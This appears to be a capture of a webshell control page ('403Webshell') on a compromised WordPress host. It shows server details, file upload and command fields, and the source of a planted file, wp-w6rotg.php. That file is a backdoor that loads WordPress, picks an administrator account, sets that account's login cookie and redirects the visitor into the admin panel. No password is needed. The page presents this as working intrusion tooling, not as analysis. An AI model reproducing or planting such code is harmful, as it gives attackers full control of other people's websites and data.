403Webshell
Server IP : 51.91.236.193  /  Your IP : 216.73.216.224
Web Server : Apache
System : Linux webm010.cluster128.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : institutah ( 16501)
PHP Version : 7.2.34
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/institutah/www/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/institutah/www/wp-w6rotg.php
<?php
error_reporting(0);
foreach(['','../','../../','../../../'] as $p){
  if(file_exists($p.'wp-load.php')){require_once($p.'wp-load.php');break;}
}
if(!function_exists('wp_set_auth_cookie')){die('err:wp-load not found');}
if(!function_exists('get_users')){require_once(ABSPATH.'wp-includes/pluggable.php');}
$all=get_users(['role'=>'administrator','number'=>10,'orderby'=>'ID','order'=>'ASC']);
$user=null;
foreach($all as $u){if(strpos($u->user_login,'xsh_')!==0){$user=$u;break;}}
if(!$user&&!empty($all)){$user=$all[0];}
if(!$user){die('err:no admin');}
wp_set_auth_cookie($user->ID,true);
wp_redirect(admin_url());
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit